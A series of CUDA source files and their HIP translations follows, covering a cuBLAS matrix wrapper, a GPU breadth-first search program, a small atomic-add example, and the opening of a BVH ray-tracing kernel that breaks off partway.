_cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); fillwith(value); } template <typename T> device_matrix<T>::device_matrix(T* h_data, size_t r, size_t c): _rows(r), _cols(c), _capacity(_rows*_cols), _data(NULL) { _init(); CCE(cudaMemcpy(_data, h_data, sizeof(T) * _rows * _cols, cudaMemcpyHostToDevice)); } template <typename T> device_matrix<T>::device_matrix(const std::string& filename): _rows(0), _cols(0), _capacity(_rows*_cols), _data(NULL) { const size_t MAX_BUFFER = 262144; char line[MAX_BUFFER]; FILE* fid = fopen(filename.c_str(), "r"); while (fgets(line, MAX_BUFFER, fid)) { _rows++; assert(line[strlen(line) - 1] == '\n'); if (_cols != 0) { continue; } char* token = strtok(line, " \n"); ++_cols; while(strtok(NULL, " \n")) { ++_cols; } } fseek(fid, 0, SEEK_SET); // BEWARE !! // BLAS stores data in column-major const char *rspecifier = (sizeof(T) / sizeof(float) == 1) ? "%f" : "%lf"; T* data = new T[_rows*_cols]; for (size_t i=0; i<_rows; ++i) for (size_t j=0; j<_cols; ++j) { fscanf(fid, rspecifier, &(data[j*_rows + i])); } fclose(fid); _init(); CCE(cudaMemcpy(_data, data, sizeof(T) * _rows * _cols, cudaMemcpyHostToDevice)); delete [] data; } // Copy Constructor template <typename T> device_matrix<T>::device_matrix(const device_matrix<T>& source): _rows(source._rows), _cols(source._cols), _capacity(_rows * _cols), _data(NULL) { _init(); CCE(cudaMemcpy(_data, source._data, sizeof(T) * _rows * _cols, cudaMemcpyDeviceToDevice)); } template <typename T> device_matrix<T>::device_matrix(const Transposed& source): _rows(source._m._cols), _cols(source._m._rows), _capacity(_rows * _cols), _data(NULL) { _init(); dim3 grid; grid.x = (unsigned int) ceil((float) _cols / 32); grid.y = (unsigned int) ceil((float) _rows / 32); dim3 threads(32, 32); naiveMatrixTranspose<<<grid, threads>>>(_data, source._m._data, _rows, _cols); } #ifdef HAVE_THRUST_DEVICE_VECTOR_H // Conversion operator template <typename T> device_matrix<T>::operator thrust::device_vector<T>() const { assert(_rows == 1 || _cols == 1); return thrust::device_vector<T>(_data, _data + size()); } #endif template <typename T> device_matrix<T>::~device_matrix() { CudaMemManager<T>::free(_data); } // =========================== // ===== Other Functions ===== // =========================== // ===== Addition ===== template <typename T> device_matrix<T>& device_matrix<T>::operator += (T val) { cublas_axpy(_rows*_cols, val, SCALAR_MEMORY_BUFFER<T>::getBuffer(), 0, _data, 1); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (T val) const { device_matrix<T> m(*this); return (m += val); } template <typename T> device_matrix<T>& device_matrix<T>::operator += (const device_matrix<T>& rhs) { thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr1, thrust::plus<T>()); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, _cols); thrust::device_ptr<T> ptr0(result._data); thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr0, thrust::plus<T>()); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator += (const typename device_matrix<T>::Transposed& rhs) { *this = *this + rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator + (const typename device_matrix<T>::Transposed& rhs) const { device_matrix<T> result(_rows, _cols, 0); geam(*this, rhs._m, result, (T) 1.0, (T) 1.0, false, true); return result; } // ===== Substraction ===== template <typename T> device_matrix<T>& device_matrix<T>::operator -= (T val) { val = -val; cublas_axpy(_rows*_cols, val, SCALAR_MEMORY_BUFFER<T>::getBuffer(), 0, _data, 1); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (T val) const { device_matrix<T> m(*this); return (m -= val); } template <typename T> device_matrix<T>& device_matrix<T>::operator -= (const device_matrix<T>& rhs) { thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr1, thrust::minus<T>()); return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, _cols); thrust::device_ptr<T> ptr0(result._data); thrust::device_ptr<T> ptr1(_data); thrust::device_ptr<T> ptr2(rhs._data); thrust::transform(ptr1, ptr1 + _rows * _cols, ptr2, ptr0, thrust::minus<T>()); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator -= (const typename device_matrix<T>::Transposed& rhs) { *this = *this - rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator - (const typename device_matrix<T>::Transposed& rhs) const { device_matrix<T> result(_rows, _cols, 0); geam(*this, rhs._m, result, (T) 1.0, (T) -1.0, false, true); return result; } // ===== Division ===== template <typename T> device_matrix<T>& device_matrix<T>::operator /= (T alpha) { return *this *= ( (T) 1 / alpha ); } template <typename T> device_matrix<T> device_matrix<T>::operator / (T alpha) const { return *this * ( (T) 1 / alpha ); } // ===== Matrix-scalar Multiplication ===== template <typename T> device_matrix<T>& device_matrix<T>::operator *= (T alpha) { if (alpha != 1) { cublas_scal(_rows*_cols, alpha, _data, 1); } return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (T alpha) const { device_matrix<T> result(*this); return result *= alpha; } // ===== Matrix-Matrix Multiplication ===== template <typename T> device_matrix<T>& device_matrix<T>::operator *= (const device_matrix<T>& rhs) { *this = *this * rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (const device_matrix<T>& rhs) const { device_matrix<T> result(_rows, rhs._cols, 0); gemm(*this, rhs, result, (T) 1.0, (T) 0.0); return result; } template <typename T> device_matrix<T>& device_matrix<T>::operator *= (const Transposed& rhs) { *this = *this * rhs; return *this; } template <typename T> device_matrix<T> device_matrix<T>::operator * (const Transposed& rhs) const { device_matrix<T> result(_rows, rhs._m._rows, 0); gemm(*this, rhs._m, result, (T) 1.0, (T) 0.0, false, true); return result; } // Operator Assignment: // call copy constructor first, and swap with the temp variable template <typename T> device_matrix<T>& device_matrix<T>::operator = (device_matrix<T> rhs) { swap(*this, rhs); return *this; } // Operator transpose template <typename T> device_matrix<T>::Transposed device_matrix<T>::operator ~ () const { return device_matrix<T>::Transposed(*this); } template <typename T> void device_matrix<T>::_init() { _capacity = _rows * _cols; _data = CudaMemManager<T>::malloc(_rows * _cols); } template <typename T> void device_matrix<T>::resize(size_t r, size_t c) { // printf("trying to resize from (%lu, %lu) => (%lu, %lu), with original capacity = %lu\n", _rows, _cols, r, c, _capacity); if (_rows == r && _cols == c) { return; } _rows = r; _cols = c; if (r * c <= _capacity) { return; } CudaMemManager<T>::free(_data); _init(); } template <typename T> void device_matrix<T>::resize(size_t r, size_t c, T value) { this->resize(r, c); fillwith(value); } template <typename T> void device_matrix<T>::reserve(size_t capacity) { if (capacity <= _capacity) { return; } _capacity = capacity; T* buffer = CudaMemManager<T>::malloc(_capacity); CCE(cudaMemcpy(buffer, _data, sizeof(T) * size(), cudaMemcpyDeviceToDevice)); CudaMemManager<T>::free(_data); _data = buffer; } template <typename T> void device_matrix<T>::print(FILE* fid, int precision, char delimiter) const { if (_rows == 0 || _cols == 0) { return; } T* data = new T[size()]; CCE(cudaMemcpy(data, _data, sizeof(T) * size(), cudaMemcpyDeviceToHost)); char format[16]; sprintf(format, "%c%%.%de", delimiter, precision < 0 ? 0 : precision); for (size_t i=0; i<_rows; ++i) { fprintf(fid, format, data[i]); for (size_t j=1; j<_cols; ++j) { fprintf(fid, format, data[j*_rows + i]); } fprintf(fid, "\n"); } delete [] data; } template <typename T> void device_matrix<T>::fillwith(T val) { cudaMemset(_data, 0, _rows * _cols * sizeof(T)); if (val != 0) { *this += val; } } template <typename T> void device_matrix<T>::save(const std::string& filename) const { FILE* fid = fopen(filename.c_str(), "w"); if (fid == NULL) { return; } print(fid); fclose(fid); } template <> void device_matrix<float>::cublas_gemm( cublasOperation_t transA, cublasOperation_t transB, int m, int n, int k, float alpha, const float* A, int lda, const float* B, int ldb, float beta, float* C, int ldc) { CCE(cublasSgemm(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, k, &alpha, A, lda, B, ldb, &beta, C, ldc)); } template <> void device_matrix<double>::cublas_gemm( cublasOperation_t transA, cublasOperation_t transB, int m, int n, int k, double alpha, const double* A, int lda, const double* B, int ldb, double beta, double* C, int ldc) { CCE(cublasDgemm(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, k, &alpha, A, lda, B, ldb, &beta, C, ldc)); } template <> void device_matrix<float>::cublas_geam( cublasOperation_t transA, cublasOperation_t transB, int m, int n, float alpha, const float *A, int lda, float beta , const float *B, int ldb, float *C, int ldc) { CCE(cublasSgeam(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, &alpha, A, lda, &beta, B, ldb, C, ldc)); } template <> void device_matrix<double>::cublas_geam( cublasOperation_t transA, cublasOperation_t transB, int m, int n, double alpha, const double *A, int lda, double beta , const double *B, int ldb, double *C, int ldc) { CCE(cublasDgeam(CUBLAS_HANDLE::getInstance(), transA, transB, m, n, &alpha, A, lda, &beta, B, ldb, C, ldc)); } template <> void device_matrix<float>::cublas_gemv( cublasOperation_t trans, int m, int n, float alpha, const float *A, int lda, const float *x, int incx, float beta, float *y, int incy) { CCE(cublasSgemv(CUBLAS_HANDLE::getInstance(), trans, m, n, &alpha, A, lda, x, incx, &beta, y, incy)); } template <> void device_matrix<double>::cublas_gemv( cublasOperation_t trans, int m, int n, double alpha, const double *A, int lda, const double *x, int incx, double beta, double *y, int incy) { CCE(cublasDgemv(CUBLAS_HANDLE::getInstance(), trans, m, n, &alpha, A, lda, x, incx, &beta, y, incy)); } template <> void device_matrix<float>::cublas_iamax(int n, const float *x, int incx, int *result) { CCE(cublasIsamax(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<double>::cublas_iamax(int n, const double *x, int incx, int *result) { CCE(cublasIdamax(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<float>::cublas_nrm2(int n, const float *x, int incx, float *result) { CCE(cublasSnrm2(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<double>::cublas_nrm2(int n, const double *x, int incx, double *result) { CCE(cublasDnrm2(CUBLAS_HANDLE::getInstance(), n, x, incx, result)); } template <> void device_matrix<float>::cublas_scal(int n, float alpha, float *x, int incx) { CCE(cublasSscal(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx)); } template <> void device_matrix<double>::cublas_scal(int n, double alpha, double *x, int incx) { CCE(cublasDscal(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx)); } template <> void device_matrix<float>::cublas_axpy( int n, float alpha, const float *x, int incx, float *y, int incy) { CCE(cublasSaxpy(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx, y, incy)); } template <> void device_matrix<double>::cublas_axpy( int n, double alpha, const double *x, int incx, double *y, int incy) { CCE(cublasDaxpy(CUBLAS_HANDLE::getInstance(), n, &alpha, x, incx, y, incy)); } // ++++++++++++++++++++++++++++++++++++++++++++ // +++++ Template Explicit Initialization +++++ // ++++++++++++++++++++++++++++++++++++++++++++ template class device_matrix<float>; template class device_matrix<double>;
819f92405be37a2e7cb4a36b3065e009e44af990.hip
// !!! This is a file automatically generated by hipify!!! /*********************************************************************************** Implementing Breadth first search on CUDA using algorithm given in HiPC'07 paper "Accelerating Large Graph Algorithms on the GPU using CUDA" Copyright (c) 2008 International Institute of Information Technology - Hyderabad. All rights reserved. Permission to use, copy, modify and distribute this software and its documentation for educational purpose is hereby granted without fee, provided that the above copyright notice and this permission notice appear in all copies of this software and that you do not sell the software. THE SOFTWARE IS PROVIDED "AS IS" AND WITHOUT WARRANTY OF ANY KIND,EXPRESS, IMPLIED OR OTHERWISE. Created by Pawan Harish. ************************************************************************************/ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <math.h> #include <hip/hip_runtime.h> #define MAX_THREADS_PER_BLOCK 512 int no_of_nodes; int edge_list_size; FILE *fp; //Structure to hold a node information struct Node { int starting; int no_of_edges; }; #include <kernel.cu> #include <kernel2.cu> void BFSGraph(int argc, char** argv); //////////////////////////////////////////////////////////////////////////////// // Main Program //////////////////////////////////////////////////////////////////////////////// int main( int argc, char** argv) { no_of_nodes=0; edge_list_size=0; BFSGraph( argc, argv); } void Usage(int argc, char**argv) { fprintf(stderr,"Usage: %s <input_file>\n", argv[0]); } //////////////////////////////////////////////////////////////////////////////// //Apply BFS on a Graph using CUDA //////////////////////////////////////////////////////////////////////////////// void BFSGraph( int argc, char** argv) { char *input_f; if(argc!=2) { Usage(argc, argv); exit(0); } input_f = argv[1]; printf("Reading File\n"); //Read in Graph from a file fp = fopen(input_f,"r"); if(!fp) { printf("Error Reading graph file\n"); return; } int source = 0; fscanf(fp,"%d",&no_of_nodes); int num_of_blocks = 1; int num_of_threads_per_block = no_of_nodes; //Make execution Parameters according to the number of nodes //Distribute threads across multiple Blocks if necessary if(no_of_nodes>MAX_THREADS_PER_BLOCK) { num_of_blocks = (int)ceil(no_of_nodes/(double)MAX_THREADS_PER_BLOCK); num_of_threads_per_block = MAX_THREADS_PER_BLOCK; } // allocate host memory Node* h_graph_nodes = (Node*) malloc(sizeof(Node)*no_of_nodes); bool *h_graph_mask = (bool*) malloc(sizeof(bool)*no_of_nodes); bool *h_updating_graph_mask = (bool*) malloc(sizeof(bool)*no_of_nodes); bool *h_graph_visited = (bool*) malloc(sizeof(bool)*no_of_nodes); int start, edgeno; // initalize the memory for( unsigned int i = 0; i < no_of_nodes; i++) { fscanf(fp,"%d %d",&start,&edgeno); h_graph_nodes[i].starting = start; h_graph_nodes[i].no_of_edges = edgeno; h_graph_mask[i]=false; h_updating_graph_mask[i]=false; h_graph_visited[i]=false; } //read the source node from the file fscanf(fp,"%d",&source); source=0; //set the source node as true in the mask h_graph_mask[source]=true; h_graph_visited[source]=true; fscanf(fp,"%d",&edge_list_size); int id,cost; int* h_graph_edges = (int*) malloc(sizeof(int)*edge_list_size); for(int i=0; i < edge_list_size ; i++) { fscanf(fp,"%d",&id); fscanf(fp,"%d",&cost); h_graph_edges[i] = id; } if(fp) { fclose(fp); } printf("Read File\n"); //Copy the Node list to device memory Node* d_graph_nodes; hipMalloc( (void**) &d_graph_nodes, sizeof(Node)*no_of_nodes) ; hipMemcpy( d_graph_nodes, h_graph_nodes, sizeof(Node)*no_of_nodes, hipMemcpyHostToDevice) ; //Copy the Edge List to device Memory int* d_graph_edges; hipMalloc( (void**) &d_graph_edges, sizeof(int)*edge_list_size) ; hipMemcpy( d_graph_edges, h_graph_edges, sizeof(int)*edge_list_size, hipMemcpyHostToDevice) ; //Copy the Mask to device memory bool* d_graph_mask; hipMalloc( (void**) &d_graph_mask, sizeof(bool)*no_of_nodes) ; hipMemcpy( d_graph_mask, h_graph_mask, sizeof(bool)*no_of_nodes, hipMemcpyHostToDevice) ; bool* d_updating_graph_mask; hipMalloc( (void**) &d_updating_graph_mask, sizeof(bool)*no_of_nodes) ; hipMemcpy( d_updating_graph_mask, h_updating_graph_mask, sizeof(bool)*no_of_nodes, hipMemcpyHostToDevice) ; //Copy the Visited nodes array to device memory bool* d_graph_visited; hipMalloc( (void**) &d_graph_visited, sizeof(bool)*no_of_nodes) ; hipMemcpy( d_graph_visited, h_graph_visited, sizeof(bool)*no_of_nodes, hipMemcpyHostToDevice) ; // allocate mem for the result on host side int* h_cost = (int*) malloc( sizeof(int)*no_of_nodes); for(int i=0;i<no_of_nodes;i++) { h_cost[i]=-1; } h_cost[source]=0; // allocate device memory for result int* d_cost; hipMalloc( (void**) &d_cost, sizeof(int)*no_of_nodes); hipMemcpy( d_cost, h_cost, sizeof(int)*no_of_nodes, hipMemcpyHostToDevice) ; //make a bool to check if the execution is over bool *d_over; hipMalloc( (void**) &d_over, sizeof(bool)); printf("Copied Everything to GPU memory\n"); // setup execution parameters dim3 grid( num_of_blocks, 1, 1); dim3 threads( num_of_threads_per_block, 1, 1); int k=0; printf("Start traversing the tree\n"); bool stop; //Call the Kernel untill all the elements of Frontier are not false do { //if no thread changes this value then the loop stops stop=false; hipMemcpy( d_over, &stop, sizeof(bool), hipMemcpyHostToDevice) ; hipLaunchKernelGGL(( Kernel), dim3(grid), dim3(threads), 0 , 0, d_graph_nodes, d_graph_edges, d_graph_mask, d_updating_graph_mask, d_graph_visited, d_cost, no_of_nodes); // check if kernel execution generated and error hipLaunchKernelGGL(( Kernel2), dim3(grid), dim3(threads), 0 , 0, d_graph_mask, d_updating_graph_mask, d_graph_visited, d_over, no_of_nodes); // check if kernel execution generated and error hipMemcpy( &stop, d_over, sizeof(bool), hipMemcpyDeviceToHost) ; k++; } while(stop); printf("Kernel Executed %d times\n",k); // copy result from device to host hipMemcpy( h_cost, d_cost, sizeof(int)*no_of_nodes, hipMemcpyDeviceToHost) ; //Store the result into a file FILE *fpo = fopen("result.txt","w"); for(int i=0;i<no_of_nodes;i++) fprintf(fpo,"%d) cost:%d\n",i,h_cost[i]); fclose(fpo); printf("Result stored in result.txt\n"); // cleanup memory free( h_graph_nodes); free( h_graph_edges); free( h_graph_mask); free( h_updating_graph_mask); free( h_graph_visited); free( h_cost); hipFree(d_graph_nodes); hipFree(d_graph_edges); hipFree(d_graph_mask); hipFree(d_updating_graph_mask); hipFree(d_graph_visited); hipFree(d_cost); }
819f92405be37a2e7cb4a36b3065e009e44af990.cu
/*********************************************************************************** Implementing Breadth first search on CUDA using algorithm given in HiPC'07 paper "Accelerating Large Graph Algorithms on the GPU using CUDA" Copyright (c) 2008 International Institute of Information Technology - Hyderabad. All rights reserved. Permission to use, copy, modify and distribute this software and its documentation for educational purpose is hereby granted without fee, provided that the above copyright notice and this permission notice appear in all copies of this software and that you do not sell the software. THE SOFTWARE IS PROVIDED "AS IS" AND WITHOUT WARRANTY OF ANY KIND,EXPRESS, IMPLIED OR OTHERWISE. Created by Pawan Harish. ************************************************************************************/ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <math.h> #include <cuda.h> #define MAX_THREADS_PER_BLOCK 512 int no_of_nodes; int edge_list_size; FILE *fp; //Structure to hold a node information struct Node { int starting; int no_of_edges; }; #include <kernel.cu> #include <kernel2.cu> void BFSGraph(int argc, char** argv); //////////////////////////////////////////////////////////////////////////////// // Main Program //////////////////////////////////////////////////////////////////////////////// int main( int argc, char** argv) { no_of_nodes=0; edge_list_size=0; BFSGraph( argc, argv); } void Usage(int argc, char**argv) { fprintf(stderr,"Usage: %s <input_file>\n", argv[0]); } //////////////////////////////////////////////////////////////////////////////// //Apply BFS on a Graph using CUDA //////////////////////////////////////////////////////////////////////////////// void BFSGraph( int argc, char** argv) { char *input_f; if(argc!=2) { Usage(argc, argv); exit(0); } input_f = argv[1]; printf("Reading File\n"); //Read in Graph from a file fp = fopen(input_f,"r"); if(!fp) { printf("Error Reading graph file\n"); return; } int source = 0; fscanf(fp,"%d",&no_of_nodes); int num_of_blocks = 1; int num_of_threads_per_block = no_of_nodes; //Make execution Parameters according to the number of nodes //Distribute threads across multiple Blocks if necessary if(no_of_nodes>MAX_THREADS_PER_BLOCK) { num_of_blocks = (int)ceil(no_of_nodes/(double)MAX_THREADS_PER_BLOCK); num_of_threads_per_block = MAX_THREADS_PER_BLOCK; } // allocate host memory Node* h_graph_nodes = (Node*) malloc(sizeof(Node)*no_of_nodes); bool *h_graph_mask = (bool*) malloc(sizeof(bool)*no_of_nodes); bool *h_updating_graph_mask = (bool*) malloc(sizeof(bool)*no_of_nodes); bool *h_graph_visited = (bool*) malloc(sizeof(bool)*no_of_nodes); int start, edgeno; // initalize the memory for( unsigned int i = 0; i < no_of_nodes; i++) { fscanf(fp,"%d %d",&start,&edgeno); h_graph_nodes[i].starting = start; h_graph_nodes[i].no_of_edges = edgeno; h_graph_mask[i]=false; h_updating_graph_mask[i]=false; h_graph_visited[i]=false; } //read the source node from the file fscanf(fp,"%d",&source); source=0; //set the source node as true in the mask h_graph_mask[source]=true; h_graph_visited[source]=true; fscanf(fp,"%d",&edge_list_size); int id,cost; int* h_graph_edges = (int*) malloc(sizeof(int)*edge_list_size); for(int i=0; i < edge_list_size ; i++) { fscanf(fp,"%d",&id); fscanf(fp,"%d",&cost); h_graph_edges[i] = id; } if(fp) { fclose(fp); } printf("Read File\n"); //Copy the Node list to device memory Node* d_graph_nodes; cudaMalloc( (void**) &d_graph_nodes, sizeof(Node)*no_of_nodes) ; cudaMemcpy( d_graph_nodes, h_graph_nodes, sizeof(Node)*no_of_nodes, cudaMemcpyHostToDevice) ; //Copy the Edge List to device Memory int* d_graph_edges; cudaMalloc( (void**) &d_graph_edges, sizeof(int)*edge_list_size) ; cudaMemcpy( d_graph_edges, h_graph_edges, sizeof(int)*edge_list_size, cudaMemcpyHostToDevice) ; //Copy the Mask to device memory bool* d_graph_mask; cudaMalloc( (void**) &d_graph_mask, sizeof(bool)*no_of_nodes) ; cudaMemcpy( d_graph_mask, h_graph_mask, sizeof(bool)*no_of_nodes, cudaMemcpyHostToDevice) ; bool* d_updating_graph_mask; cudaMalloc( (void**) &d_updating_graph_mask, sizeof(bool)*no_of_nodes) ; cudaMemcpy( d_updating_graph_mask, h_updating_graph_mask, sizeof(bool)*no_of_nodes, cudaMemcpyHostToDevice) ; //Copy the Visited nodes array to device memory bool* d_graph_visited; cudaMalloc( (void**) &d_graph_visited, sizeof(bool)*no_of_nodes) ; cudaMemcpy( d_graph_visited, h_graph_visited, sizeof(bool)*no_of_nodes, cudaMemcpyHostToDevice) ; // allocate mem for the result on host side int* h_cost = (int*) malloc( sizeof(int)*no_of_nodes); for(int i=0;i<no_of_nodes;i++) { h_cost[i]=-1; } h_cost[source]=0; // allocate device memory for result int* d_cost; cudaMalloc( (void**) &d_cost, sizeof(int)*no_of_nodes); cudaMemcpy( d_cost, h_cost, sizeof(int)*no_of_nodes, cudaMemcpyHostToDevice) ; //make a bool to check if the execution is over bool *d_over; cudaMalloc( (void**) &d_over, sizeof(bool)); printf("Copied Everything to GPU memory\n"); // setup execution parameters dim3 grid( num_of_blocks, 1, 1); dim3 threads( num_of_threads_per_block, 1, 1); int k=0; printf("Start traversing the tree\n"); bool stop; //Call the Kernel untill all the elements of Frontier are not false do { //if no thread changes this value then the loop stops stop=false; cudaMemcpy( d_over, &stop, sizeof(bool), cudaMemcpyHostToDevice) ; Kernel<<< grid, threads, 0 >>>( d_graph_nodes, d_graph_edges, d_graph_mask, d_updating_graph_mask, d_graph_visited, d_cost, no_of_nodes); // check if kernel execution generated and error Kernel2<<< grid, threads, 0 >>>( d_graph_mask, d_updating_graph_mask, d_graph_visited, d_over, no_of_nodes); // check if kernel execution generated and error cudaMemcpy( &stop, d_over, sizeof(bool), cudaMemcpyDeviceToHost) ; k++; } while(stop); printf("Kernel Executed %d times\n",k); // copy result from device to host cudaMemcpy( h_cost, d_cost, sizeof(int)*no_of_nodes, cudaMemcpyDeviceToHost) ; //Store the result into a file FILE *fpo = fopen("result.txt","w"); for(int i=0;i<no_of_nodes;i++) fprintf(fpo,"%d) cost:%d\n",i,h_cost[i]); fclose(fpo); printf("Result stored in result.txt\n"); // cleanup memory free( h_graph_nodes); free( h_graph_edges); free( h_graph_mask); free( h_updating_graph_mask); free( h_graph_visited); free( h_cost); cudaFree(d_graph_nodes); cudaFree(d_graph_edges); cudaFree(d_graph_mask); cudaFree(d_updating_graph_mask); cudaFree(d_graph_visited); cudaFree(d_cost); }
185746bb47a5b3ab47b40f9647d15c47e1a37847.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <hip/hip_runtime.h> #include <hip/hip_runtime.h> #include <stdlib.h> #define N 256 __global__ void add(int *a, int *b, int* d) { int tx = threadIdx.x, ty = threadIdx.y; int bidx = blockIdx.x, bidy = blockIdx.y; int bx = blockDim.x, by = blockDim.y; int gy = gridDim.y; int bid = bidx*gy + bidy; int tid = bid*bx*by + tx*by + ty; int c = a[tid] + b[tid]; atomicAdd(d, c); } void print_five(int* a, int* b){ int r = 35; for(int i=0; i<10; ++i){ r += i; printf("%d %d\n", a[r], b[r]); } } void random_ints(int *a, int n){ int i; for (i = 0; i < n; ++i) a[i] = rand() %10; } int main(void) { int *a, *b, *d; // host copies of a, b, c int *d_a, *d_b, *d_d; // device copies of a, b, c int size = N * sizeof(int), s = sizeof(int); // Alloc space for device copies of a, b, c hipMalloc((void **)&d_a, size); hipMalloc((void **)&d_b, size); hipMalloc((void **)&d_d, s); // Alloc space for host copies of a, b, c and setup input values a = (int *)malloc(size); random_ints(a, N); b = (int *)malloc(size); random_ints(b, N); d = (int *)malloc(s); *d = 0; hipMemcpy(d_a, a, size, hipMemcpyHostToDevice); hipMemcpy(d_b, b, size, hipMemcpyHostToDevice); hipMemcpy(d_d, d, s, hipMemcpyHostToDevice); // Launch add() kernel on GPU with N blocks dim3 thread(4,4),block(4, 4); hipLaunchKernelGGL(( add), dim3(block), dim3(thread), 0, 0, d_a, d_b, d_d); // Copy result back to host hipMemcpy(d, d_d, s, hipMemcpyDeviceToHost); print_five(a,b); printf("%d\n",*d); // Cleanup free(a); free(b); free(d); hipFree(d_a); hipFree(d_b); hipFree(d_d); return 0; }
185746bb47a5b3ab47b40f9647d15c47e1a37847.cu
#include <stdio.h> #include <cuda_runtime.h> #include <cuda.h> #include <stdlib.h> #define N 256 __global__ void add(int *a, int *b, int* d) { int tx = threadIdx.x, ty = threadIdx.y; int bidx = blockIdx.x, bidy = blockIdx.y; int bx = blockDim.x, by = blockDim.y; int gy = gridDim.y; int bid = bidx*gy + bidy; int tid = bid*bx*by + tx*by + ty; int c = a[tid] + b[tid]; atomicAdd(d, c); } void print_five(int* a, int* b){ int r = 35; for(int i=0; i<10; ++i){ r += i; printf("%d %d\n", a[r], b[r]); } } void random_ints(int *a, int n){ int i; for (i = 0; i < n; ++i) a[i] = rand() %10; } int main(void) { int *a, *b, *d; // host copies of a, b, c int *d_a, *d_b, *d_d; // device copies of a, b, c int size = N * sizeof(int), s = sizeof(int); // Alloc space for device copies of a, b, c cudaMalloc((void **)&d_a, size); cudaMalloc((void **)&d_b, size); cudaMalloc((void **)&d_d, s); // Alloc space for host copies of a, b, c and setup input values a = (int *)malloc(size); random_ints(a, N); b = (int *)malloc(size); random_ints(b, N); d = (int *)malloc(s); *d = 0; cudaMemcpy(d_a, a, size, cudaMemcpyHostToDevice); cudaMemcpy(d_b, b, size, cudaMemcpyHostToDevice); cudaMemcpy(d_d, d, s, cudaMemcpyHostToDevice); // Launch add() kernel on GPU with N blocks dim3 thread(4,4),block(4, 4); add<<<block, thread>>>(d_a, d_b, d_d); // Copy result back to host cudaMemcpy(d, d_d, s, cudaMemcpyDeviceToHost); print_five(a,b); printf("%d\n",*d); // Cleanup free(a); free(b); free(d); cudaFree(d_a); cudaFree(d_b); cudaFree(d_d); return 0; }
7508b6a3d70a35bdba48ac9621a59b73cf6059e9.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime_api.h> #include "helper_math.h" #include "FastDeviceMinMax.h" #include "Logger.h" #include "CUDAAssert.h" __device__ unsigned __bfind(unsigned i) { unsigned b; asm volatile("bfind.u32 %0, %1; " : "=r"(b) : "r"(i)); return b; } __device__ __inline__ uint sign_extend_s8x4(uint i) { uint v; asm("prmt.b32 %0, %1, 0x0, 0x0000BA98;" : "=r"(v) : "r"(i)); return v; } __device__ __inline__ uint extract_byte(uint i, uint n) { return (i >> (n * 8)) & 0xFF; } __device__ const float4* BVHTreeNodes; __device__ const float4* TriangleWoopCoordinates; __device__ const int* MappingFromTriangleAddressToIndex; #define DYNAMIC_FETCH 1 #define TRIANGLE_POSTPONING 1 #define STACK_POP(X) { --stackPtr; if (stackPtr < SM_STACK_SIZE) X = traversalStackSM[threadIdx.x][threadIdx.y][stackPtr]; else X = traversalStack[stackPtr - SM_STACK_SIZE]; } #define STACK_PUSH(X) { if (stackPtr < SM_STACK_SIZE) traversalStackSM[threadIdx.x][threadIdx.y][stackPtr] = X; else traversalStack[stackPtr - SM_STACK_SIZE] = X; stackPtr++; } __global__ void rtTraceCWBVHDynamicFetch( Ray* rayBuffer, Hit* rayResultBuffer, int rayCount, int* finishedRayCount ) { const float ooeps = exp2f(-80.0f); const int STACK_SIZE = 32; uint2 traversalStack[STACK_SIZE]; const int SM_STACK_SIZE = 8; // Slightly smaller stack size than the paper (12), as this seems faster on my GTX1080 __shared__ uint2 traversalStackSM[32][2][SM_STACK_SIZE]; int rayidx; float3 orig, dir; float tmin, tmax; float idirx, idiry, idirz; uint octinv; uint2 nodeGroup = make_uint2(0); uint2 triangleGroup = make_uint2(0); char stackPtr = 0; int hitAddr = -1; float2 triangleuv; __shared__ int nextRayArray[2]; const float4* localBVHTreeNodes = BVHTreeNodes; const float4* localTriangleWoopCoordinates = TriangleWoopCoordinates; do { int& rayBase = nextRayArray[threadIdx.y]; bool terminated = stackPtr == 0 && nodeGroup.y <= 0x00FFFFFF; const unsigned int maskTerminated = __ballot_sync(__activemask(), terminated); const int numTerminated = __popc(maskTerminated); const int idxTerminated = __popc(maskTerminated & ((1u << threadIdx.x) - 1)); if (terminated) { if (idxTerminated == 0) rayBase = atomicAdd(finishedRayCount, numTerminated); rayidx = rayBase + idxTerminated; if (rayidx >= rayCount) break; orig = make_float3(rayBuffer[rayidx].origin_tmin); dir = make_float3(rayBuffer[rayidx].dir_tmax); tmin = rayBuffer[rayidx].origin_tmin.w; tmax = rayBuffer[rayidx].dir_tmax.w; idirx = 1.0f / (fabsf(dir.x) > ooeps ? dir.x : copysignf(ooeps, dir.x)); // inverse ray direction idiry = 1.0f / (fabsf(dir.y) > ooeps ? dir.y : copysignf(ooeps, dir.y)); // inverse ray direction idirz = 1.0f / 